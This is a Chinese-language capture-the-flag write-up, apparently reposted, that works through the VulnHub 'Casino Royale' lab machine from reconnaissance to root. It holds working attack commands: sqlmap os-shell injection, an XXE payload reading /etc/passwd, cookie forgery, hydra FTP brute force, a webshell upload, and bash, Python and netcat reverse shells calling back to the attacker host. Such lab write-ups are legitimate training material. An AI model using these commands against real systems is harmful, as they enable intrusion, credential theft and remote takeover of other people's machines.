Casino Royale靶場wp

0x00 下載安裝

https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova

導入vmware啟動

0x01 主機信息收集

0x02目錄掃描

index.php 獲取到一個域名

修改本地hosts 添加一行

路徑：C:\Windows\System32\drivers\etc

192.168.2.20 casino-royale.local

點擊view，有點像sql查詢，抓包看看

很像注入點，sqlmap嗦一把，

一個延遲注入

獲取了三個用戶

--os-shell 寫不進去可能是我重啟過靶機應該可以寫入的

只能用個sqlshell

select @@datadir: '/var/lib/mysql/' 文件寫不進去，換個方向

install 一個安裝PokerMax Pro Poker League Software頁面

查找到一個漏洞 PokerMax Poker League 0.13 - Insecure Cookie Handling - PHP webapps Exploit 添加cookie 獲得管理員登錄

8081端口，沒看出來啥，執行了是一個日志的東西

0x03繞過

1. 通過sql注入繞過

這里看前面大佬有搜到源碼，現在搜不到了

/pokeradmin/configure.php 登陸處存在注入，并且未做sql注入防護

sqlmap -u http://casino-royale.local/pokeradmin/ --level=5 --risk=3 --os-shell --batch --forms

通過wget下載一句話木馬，wget http://192.168.2.11/1.txt mv 1.txt 1.php 重命名

路徑為 http://casino-royale.local/pokeradmin/1.php 可以通過os-shell獲取路徑

獲取到數據庫賬戶密碼 valenka 11archives11

2.漏洞繞過

查找歷史漏洞

searchsploit PokerMax

searchsploit -m php/webapps/6766.txt

在瀏覽器f12控制臺執行js腳本

javascript:document.cookie = "ValidUserAdmin=admin";

重新訪問，成功繞過登錄

得到用戶名密碼 admin raise12million

只有Valenka里面有東西

得到一個路徑

需要使用域名，把路徑加到后面 http://casino-royale.local/vip-client-portfolios/?uri=blog

有登錄注冊重置

密碼不知道，重置密碼，發送到了管理員賬戶，

找一下漏洞。

有一個csrf

Snowfox CMS 查找cms漏洞。有一個csrf

Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin) - PHP webapps Exploit

EHLO test5
MAIL FROM:obanno@bond.com
RCPT TO:valenka
DATA
Subject:obanno
http://192.168.2.11/index.html
obanno
kthxbai

發了n個郵件，一個也沒成功跳過了登錄獲取到路徑

view-source:http://casino-royale.local//ultra-access-view/main.php

查看源代碼是一個xxe 可以讀取文件

寫入修改為post 用戶名為

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY file SYSTEM "file:///etc/passwd" >]> <creds> <customer>&file;</customer> <password>mypass</password> </creds>

ftpUserULTRA 提到密碼很簡單，來一波爆破

hydra -l ftpUserULTRA -P ignis-1K.txt ftp://192.168.2.21

得到密碼為 ftpUserULTRA bankbank

三個文件

perl文件剛好是該目錄下 http://casino-royale.local/ultra-access-view/hello_world.pl 文件可以被執行，權限可讀可執行，，想辦法寫入反彈shell

直接找了個大馬，上傳，webshell/pl/pps-pl/pps-v4.0.pl at master · tennc/webshell · GitHub

執行反彈shell

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' ;

0x04 獲取le權限

查找可提權文件，

find / -type f -user root -perm -o=w 2>/dev/null | grep -v 'proc\|sys'

開啟監聽

反彈shell提權沒啥用，沒得到權限

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' \;

查找可提權文件

find / -user root -perm -4000 -print 2>/dev/null

發現一個路徑/opt/casino-royale/mi6_detect_test 這幾個文件的權限很特別

這正好是8081端口運行的服務，點擊跳轉到http://casino-royale.local:8081/collect.php

查看源碼，該文件會執行目錄下的py文件，不可修改

點擊按鈕，會跳轉運行collect.php ，執行 casino-data-collection.py 我們直接寫入python反彈shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.11",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

啟動監聽，獲取shell,得到le權限，接下來要獲取root

0x05 獲取root權限

mi6_detect_test為root所有，會執行run.sh文件，我們通過echo命令開一個正向連接，寫入run.sh在運行mi6既可獲取到root權限 echo "nc -lvvp 1234 -t -e /bin/bash" >> run.sh

成功拿下

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/web/64538.shtml
繁體地址，請注明出處：http://hk.pswp.cn/web/64538.shtml
英文地址，請注明出處：http://en.pswp.cn/web/64538.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！